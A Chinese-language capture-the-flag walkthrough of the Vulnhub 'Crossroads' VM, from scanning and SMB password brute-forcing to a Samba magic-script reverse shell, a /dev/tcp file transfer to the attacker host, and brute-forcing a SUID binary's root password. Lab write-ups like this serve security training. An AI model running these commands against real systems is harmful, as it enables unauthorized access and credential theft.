Crossroads

识别目标主机IP地址

                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.98.0/16   |   Screen View: Unique Hosts                                                                                                                                                             
                                                                                                                                                                                                                                 
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                
 192.168.56.100  08:00:27:c4:83:a7      1      60  PCS Systemtechnik GmbH                                                                                                                                                        
 192.168.56.181  08:00:27:b8:0e:1f      1      60  PCS Systemtechnik GmbH      

利用Kali Linux自带的netdiscover识别目标主机的IP地址为192.168.56.181

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.181 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-16 06:45 EST
Nmap scan report for bogon (192.168.56.181)
Host is up (0.000076s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
|_http-title: 12 Step Treatment Center | Crossroads Centre Antigua
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/crossroads.png
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:B8:0E:1F (Oracle VirtualBox virtual NIC)
Service Info: Host: CROSSROADS

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: crossroads
|   NetBIOS computer name: CROSSROADS\x00
|   Domain name: \x00
|   FQDN: crossroads
|_  System time: 2022-11-16T05:46:02-06:00
|_clock-skew: mean: 1h59m58s, deviation: 3h27m50s, median: -1s
|_nbstat: NetBIOS name: CROSSROADS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-11-16T11:46:02
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.24 seconds

目标主机3个开放端口,80(http),其他两个端口(samba)

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ smbclient -L 192.168.56.181                                
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        smbshare        Disk      
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            CROSSROADS

                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ smbclient //192.168.56.181/smbshare
Password for [WORKGROUP\kali]:
tree connect failed: NT_STATUS_ACCESS_DENIED


└─$ enum4linux 192.168.56.181
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Nov 16 06:50:29 2022

 =========================================( Target Information )=========================================

Target ........... 192.168.56.181
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.56.181 )===========================


[+] Got domain/workgroup name: WORKGROUP


 ===============================( Nbtstat Information for 192.168.56.181 )===============================

Looking up status of 192.168.56.181
        CROSSROADS      <00> -         B <ACTIVE>  Workstation Service
        CROSSROADS      <03> -         B <ACTIVE>  Messenger Service
        CROSSROADS      <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                                                                                                                       
                                                                                                                                                                                                                                  
S-1-22-1-1000 Unix User\albert (Local User)                                                                                                                                                                                       

[+] Enumerating users using SID S-1-5-21-198007098-3908253677-2746664996 and logon username '', password ''                                                                                                                       
                                                                                                                                                                                                                                  
S-1-5-21-198007098-3908253677-2746664996-501 CROSSROADS\nobody (Local User)                                                                                                                                                       
S-1-5-21-198007098-3908253677-2746664996-513 CROSSROADS\None (Domain Group)
S-1-5-21-198007098-3908253677-2746664996-1001 CROSSROADS\albert (Local User)

发现了用户名albert

接下来看一下80端口的情况

从页面源代码,目标站点运行wordpress

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ curl http://192.168.56.181/robots.txt     
User-agent: *
Disallow: /crossroads.png
                          ┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ wget http://192.168.56.181/crossroads.png 
--2022-11-16 06:55:46--  http://192.168.56.181/crossroads.png
Connecting to 192.168.56.181:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1100255 (1.0M) [image/png]
Saving to: ‘crossroads.png’

crossroads.png                                           100%[================================================================================================================================>]   1.05M  --.-KB/s    in 0.02s   

2022-11-16 06:55:46 (68.9 MB/s) - ‘crossroads.png’ saved [1100255/1100255]

                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ ls
crossroads.png  nmap_full_scan
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ steghide extract -sf crossroads.png 
Enter passphrase: 
steghide: the file format of the file "crossroads.png" is not supported.
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ stegseek  crossroads.png /usr/share/wordlists/rockyou.txt 
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[!] error: the file format of the file "crossroads.png" is not supported.

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ gobuster dir -u http://192.168.56.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                      
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.181
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/16 06:57:15 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
Progress: 217109 / 220561 (98.43%)===============================================================
2022/11/16 06:57:44 Finished
===============================================================
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ dirb http://192.168.56.181

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Nov 16 06:57:55 2022
URL_BASE: http://192.168.56.181/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.181/ ----
+ http://192.168.56.181/index.html (CODE:200|SIZE:93075)                                                                                                                                                                         
+ http://192.168.56.181/robots.txt (CODE:200|SIZE:42)                                                                                                                                                                            
+ http://192.168.56.181/server-status (CODE:403|SIZE:279)                                                                                                                                                                        
                                                                                                                                                                                                                                 
-----------------
END_TIME: Wed Nov 16 06:57:56 2022
DOWNLOADED: 4612 - FOUND: 3
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ gobuster dir -u http://192.168.56.181 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.181
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              sh,php,html,txt
[+] Timeout:                 10s
===============================================================
2022/11/16 06:58:12 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 93075]
/robots.txt           (Status: 200) [Size: 42]
/note.txt             (Status: 200) [Size: 108]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1099489 / 1102805 (99.70%)===============================================================
2022/11/16 07:00:41 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ curl http://192.168.56.181/note.txt                                                          
just find three kings of blues
then move to the crossroads
-------------------------------
-abuzerkomurcu       

不知道什么意思,回过头去破解SMB协议,已经知道了用户名

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ hydra -l albert -P /usr/share/wordlists/rockyou.txt smb://192.168.56.181
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-16 07:05:08
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.168.56.181:445/
[STATUS] 5065.00 tries/min, 5065 tries in 00:01h, 14339334 to do in 47:12h, 1 active
[STATUS] 5236.67 tries/min, 15710 tries in 00:03h, 14328689 to do in 45:37h, 1 active
[STATUS] 5268.00 tries/min, 36876 tries in 00:07h, 14307523 to do in 45:16h, 1 active
[STATUS] 5246.70 tries/min, 78788 tries in 00:15h, 14265611 to do in 45:19h, 1 active
[STATUS] 5231.90 tries/min, 162276 tries in 00:31h, 14182123 to do in 45:11h, 1 active
[STATUS] 5222.51 tries/min, 245545 tries in 00:47h, 14098854 to do in 44:60h, 1 active
^C
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
                                                                                     

没有破解出来,根据其他人的做法需要用medusa

                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ medusa -h 192.168.56.181 -u albert -P /usr/share/wordlists/rockyou.txt -M smbnt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 123456 (1 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 12345 (2 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 123456789 (3 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: password (4 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: iloveyou (5 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: princess (6 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: 1234567 (7 of 14344391 complete)
ACCOUNT CHECK: [smbnt] Host: 192.168.56.181 (1 of 1, 0 complete) User: albert (1 of 1, 0 complete) Password: bradley1 (3842 of 14344391 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.56.181 User: albert Password: bradley1 [SUCCESS (ADMIN$ - Share Unavailable)]

非常快地就破解出来密码:bradley1 (看来真是不能依赖一种工具)

Medusa支持的模块名称在:

┌──(kali㉿kali)-[/usr/…/dist-packages/faraday_plugins/plugins/repo]
└─$ find / -name *medusa* 2>/dev/null
/usr/lib/x86_64-linux-gnu/medusa
/usr/lib/python3/dist-packages/faraday_plugins/plugins/repo/medusa
/usr/bin/medusa
/usr/share/bash-completion/completions/medusa
/usr/share/doc/medusa
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[/usr/…/dist-packages/faraday_plugins/plugins/repo]
└─$ cd /usr/lib/x86_64-linux-gnu/medusa                            
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa]
└─$ ls
modules
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa]
└─$ cd modules                         
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa/modules]
└─$ ls -alh | grep smb            
-rwxr-xr-x 1 root root  42K May 15  2022 smbnt.mod
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa/modules]
└─$ ls                
cvs.mod  http.mod  mssql.mod  nntp.mod        pop3.mod      rexec.mod   rsh.mod    smtp.mod       snmp.mod  svn.mod     vmauthd.mod  web-form.mod
ftp.mod  imap.mod  mysql.mod  pcanywhere.mod  postgres.mod  rlogin.mod  smbnt.mod  smtp-vrfy.mod  ssh.mod   telnet.mod  vnc.mod      wrapper.mod
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[/usr/lib/x86_64-linux-gnu/medusa/modules]

接下来用前面破解的密码登录SMB

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo smbclient //192.168.56.181/smbshare -U albert
[sudo] password for kali: 
Password for [WORKGROUP\albert]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Mar  2 17:16:13 2021
  ..                                  D        0  Sat Mar  6 07:45:15 2021
  smb.conf                            N     8779  Tue Mar  2 17:14:54 2021

                4000320 blocks of size 1024. 3759668 blocks available
smb: \> get smb.conf
getting file \smb.conf of size 8779 as smb.conf (4286.4 KiloBytes/sec) (average 4286.6 KiloBytes/sec)
smb: \> exit
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ ls
crossroads.png  hydra.restore  nmap_full_scan  smb.conf
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ cat smb.conf           
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which 
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
#  - When such options are commented with ";", the proposed setting
#    differs from the default Samba behaviour
#  - When commented with "#", the proposed setting is the default
#    behaviour of Samba but the option is considered important
#    enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic 
# errors. 

#======================= Global Settings =======================

[global]

## Browsing/Identification ###

# Change this to the workgroup/NT-domain name your Samba server will part of
   workgroup = WORKGROUP

#### Networking ####

# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
;   interfaces = 127.0.0.0/8 eth0

# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself.  However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
;   bind interfaces only = yes



#### Debugging/Accounting ####

# This tells Samba to use a separate log file for each machine
# that connects
   log file = /var/log/samba/log.%m

# Cap the size of the individual log files (in KiB).
   max log size = 1000

# We want Samba to only log to /var/log/samba/log.{smbd,nmbd}.
# Append syslog@1 if you want important messages to be sent to syslog too.
   logging = file

# Do something sensible when Samba crashes: mail the admin a backtrace
   panic action = /usr/share/samba/panic-action %d


####### Authentication #######

# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller". 
#
# Most people will want "standalone server" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
   server role = standalone server

   obey pam restrictions = yes

# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
   unix password sync = yes

# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
   passwd program = /usr/bin/passwd %u
   passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .

# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
   pam password change = yes

# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
   map to guest = bad user

########## Domains ###########

#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set 
#

# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
;   logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
#   logon path = \\%N\%U\profile

# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
;   logon drive = H:
#   logon home = \\%N\%U

# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
;   logon script = logon.cmd

# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe.  The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u

# This allows machine accounts to be created on the domain controller via the 
# SAMR RPC pipe.  
# The following assumes a "machines" group exists on the system
; add machine script  = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u

# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.  
; add group script = /usr/sbin/addgroup --force-badname %g

############ Misc ############

# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
;   include = /home/samba/etc/smb.conf.%m

# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
;   idmap config * :              backend = tdb
;   idmap config * :              range   = 3000-7999
;   idmap config YOURDOMAINHERE : backend = tdb
;   idmap config YOURDOMAINHERE : range   = 100000-999999
;   template shell = /bin/bash

# Setup usershare options to enable non-root users to share folders
# with the net usershare command.

# Maximum number of usershare. 0 means that usershare is disabled.
#   usershare max shares = 100

# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
   usershare allow guests = yes

#======================= Share Definitions =======================

[homes]
   comment = Home Directories
   browseable = no

# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
   read only = yes

# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
   create mask = 0700

# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
   directory mask = 0700

# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# The following parameter makes sure that only "username" can connect
# to \\server\username
# This might need tweaking when using external authentication schemes
   valid users = %S

# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
;   comment = Network Logon Service
;   path = /home/samba/netlogon
;   guest ok = yes
;   read only = yes

# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
;   comment = Users profiles
;   path = /home/samba/profiles
;   guest ok = no
;   browseable = no
;   create mask = 0600
;   directory mask = 0700

[printers]
   comment = All Printers
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no
   read only = yes
   create mask = 0700

# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
;   write list = root, @lpadmin

[smbshare]

path = /home/albert/smbshare
valid users = albert
browsable = yes
writable = yes
read only = no
magic script = smbscript.sh
guest ok = no
                            

发现 magic script 选项,网上解释说打开共享文件夹的时候就会执行 magic script 指定的脚本。 那我们就编写一个 script 上传到这个文件夹里面。

首先在Kali上启动侦听,然后smb连接目标主机,put script脚本,在put过程中shell就会被反弹回kali

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo smbclient //192.168.56.181/smbshare -U albert
Password for [WORKGROUP\albert]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Mar  2 17:16:13 2021
  ..                                  D        0  Sat Mar  6 07:45:15 2021
  smb.conf                            N     8779  Tue Mar  2 17:14:54 2021

                4000320 blocks of size 1024. 3759668 blocks available
smb: \> put smbscript.sh
NT_STATUS_UNSUCCESSFUL closing remote file \smbscript.sh
smb: \> ls
  .                                   D        0  Wed Nov 16 08:09:27 2022
  ..                                  D        0  Sat Mar  6 07:45:15 2021
  smb.conf                            N     8779  Tue Mar  2 17:14:54 2021

                4000320 blocks of size 1024. 3759668 blocks available
smb: \> put smbscript.sh
NT_STATUS_IO_TIMEOUT closing remote file \smbscript.sh
smb: \> 

──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.181] 36580
id
uid=1000(albert) gid=1000(albert) groups=1000(albert)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
albert@crossroads:/home/albert/smbshare$ 

成功拿到了shell

另外spawn一个shell,将crossroads.png以及beroot文件下载到kali

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo nc -nlvp 8888 > cross.jpg
[sudo] password for kali: 
listening on [any] 8888 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.181] 55362
albert@crossroads:/home/albert$ ls -alh
ls -alh
total 1.6M
drwxr-xr-x 3 albert albert 4.0K Mar  6  2021 .
drwxr-xr-x 3 root   root   4.0K Mar  2  2021 ..
-rwsr-xr-x 1 root   root    17K Mar  2  2021 beroot
-rw-r--r-- 1 albert albert 1.6M Mar  2  2021 crossroads.png
drwxrwxrwx 2 albert albert 4.0K Nov 16 07:10 smbshare
-r-x------ 1 albert albert 1.8K Jan  3  2021 user.txt
albert@crossroads:/home/albert$ cat crossroads.png > /dev/tcp/192.168.56.137/8888
<$ cat crossroads.png > /dev/tcp/192.168.56.137/8888
albert@crossroads:/home/albert$ 

由于 steghide 不支持 png 文件,查看其他人的做法发现了一个新的工具:stegoveritas

┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ sudo pip install stegoveritas  
Collecting stegoveritas
  Downloading stegoveritas-1.9.tar.gz (77 kB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 77.8/77.8 kB 177.6 kB/s eta 0:00:00
  Preparing metadata (setup.py) ... done
Collecting ┌──(kali㉿kali)-[~/Vulnhub/Crossroads]
└─$ stegoveritas cross.png 
ERROR:StegoVeritas:Missing the following required packages: foremost, libexempi3
ERROR:StegoVeritas:Either install them manually or run 'stegoveritas_install_deps'.
Running Module: SVImage
+---------------------------+------+
|        Image Format       | Mode |
+---------------------------+------+
| Portable network graphics | RGBA |
+---------------------------+------+
ERROR:stegoveritas.helpers:not supported for this image mode
ERROR:stegoveritas.helpers:
"""                    apng

┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ ls                                                      
1668605632.515148-acdbbd842fee9302ae4de398d1ab2300   1668605655.125798-bcffc227ec961d9a422307bc56aa9f80   1668605658.7701492-c264536d7e1bbac0e84d7561bd46aacd  1668605662.1177938-deacfe6927ff1e957b146f28457567cf
1668605635.4692078-cdaac7888d6459d35735a7a017745968  1668605655.8980753-4aef70b7df286874d7f5bf43305de4bb  1668605659.3538682-7aabde43efa4d275e91debe133aa8673  1668605679.751733-f925d60b59b4b1cb85922e3b7efcbcde
1668605652.915446-dce62c225527f62f593c71e9fdfbe765   1668605657.028825-c3d9ec0541be0e353038bbaa263d8406   1668605661.0991077-b893f2c01edf8bb4d21bb2ce9c510156  29
1668605654.491967-2c2e9e198566dca626c518c23661cabc   1668605657.3429148-c0d183c52e81f473c0daafe50e0eece4  1668605662.0214634-f5b1ded00bfad7d6160891ff386379c1  29.zlib
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ 
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ 
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ pwd               
/home/kali/Vulnhub/Crossroads/results/keepers
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]

只有第一个文件看起来时密码字典,改一下名字,然后上传到目标主机

──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ pwd               
/home/kali/Vulnhub/Crossroads/results/keepers
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ mv 1668605632.515148-acdbbd842fee9302ae4de398d1ab2300 passlist
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ ls
1668605635.4692078-cdaac7888d6459d35735a7a017745968  1668605655.8980753-4aef70b7df286874d7f5bf43305de4bb  1668605659.3538682-7aabde43efa4d275e91debe133aa8673  1668605679.751733-f925d60b59b4b1cb85922e3b7efcbcde
1668605652.915446-dce62c225527f62f593c71e9fdfbe765   1668605657.028825-c3d9ec0541be0e353038bbaa263d8406   1668605661.0991077-b893f2c01edf8bb4d21bb2ce9c510156  29
1668605654.491967-2c2e9e198566dca626c518c23661cabc   1668605657.3429148-c0d183c52e81f473c0daafe50e0eece4  1668605662.0214634-f5b1ded00bfad7d6160891ff386379c1  29.zlib
1668605655.125798-bcffc227ec961d9a422307bc56aa9f80   1668605658.7701492-c264536d7e1bbac0e84d7561bd46aacd  1668605662.1177938-deacfe6927ff1e957b146f28457567cf  passlist
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Crossroads/results/keepers]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.181 - - [16/Nov/2022 08:46:38] "GET /passlist HTTP/1.1" 200 -

albert@crossroads:/home/albert$ ls
ls
beroot  crossroads.png  passlist  smbshare  user.txt
albert@crossroads:/home/albert$ ls -alh
ls -alh
total 1.9M
drwxr-xr-x 3 albert albert 4.0K Nov 16 07:46 .
drwxr-xr-x 3 root   root   4.0K Mar  2  2021 ..
-rwsr-xr-x 1 root   root    17K Mar  2  2021 beroot
-rw-r--r-- 1 albert albert 1.6M Mar  2  2021 crossroads.png
-rw-rw-rw- 1 albert albert 355K Nov 16 07:33 passlist
drwxrwxrwx 2 albert albert 4.0K Nov 16 07:10 smbshare
-r-x------ 1 albert albert 1.8K Jan  3  2021 user.txt
albert@crossroads:/home/albert$ 

beroot程序有SUID位,可以用来提权,运行这个程序提示需要输入root密码

albert@crossroads:/home/albert$ ./beroot
./beroot
TERM environment variable not set.
enter password for root
-----------------------

password: dd
dd
wrong password!!!

因此编写shell脚本,对密码进行爆破:

for i in $(cat passlist);do echo $i | ./beroot; echo $i;done | grep -v wrong
albert@crossroads:/home/albert$ cat rootcreds
cat rootcreds
root
___drifting___
albert@crossroads:/home/albert$ su - root
su - root
Password: ___drifting___

root@crossroads:~# cd /root
cd /root
root@crossroads:~# ls 
ls 
beroot.sh  creds  passwd  root.txt
root@crossroads:~# cat root.txt
cat root.txt
flag 2/2
░░░░░░▄▄▄▄▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄
░░░░░█░░░░░░░░░░░░░░░░░░▀▀▄
░░░░█░░░░░░░░░░░░░░░░░░░░░░█
░░░█░░░░░░▄██▀▄▄░░░░░▄▄▄░░░░█
░▄▀░▄▄▄░░█▀▀▀▀▄▄█░░░██▄▄█░░░░█
█░░█░▄░▀▄▄▄▀░░░░░░░░█░░░░░░░░░█
█░░█░█▀▄▄░░░░░█▀░░░░▀▄░░▄▀▀▀▄░█
░█░▀▄░█▄░█▀▄▄░▀░▀▀░▄▄▀░░░░█░░█
░░█░░░▀▄▀█▄▄░█▀▀▀▄▄▄▄▀▀█▀██░█
░░░█░░░░██░░▀█▄▄▄█▄▄█▄▄██▄░░█
░░░░█░░░░▀▀▄░█░░░█░█▀█▀█▀██░█
░░░░░▀▄░░░░░▀▀▄▄▄█▄█▄█▄█▄▀░░█
░░░░░░░▀▄▄░░░░░░░░░░░░░░░░░░░█
░░▐▌░█░░░░▀▀▄▄░░░░░░░░░░░░░░░█
░░░█▐▌░░░░░░█░▀▄▄▄▄▄░░░░░░░░█
░░███░░░░░▄▄█░▄▄░██▄▄▄▄▄▄▄▄▀
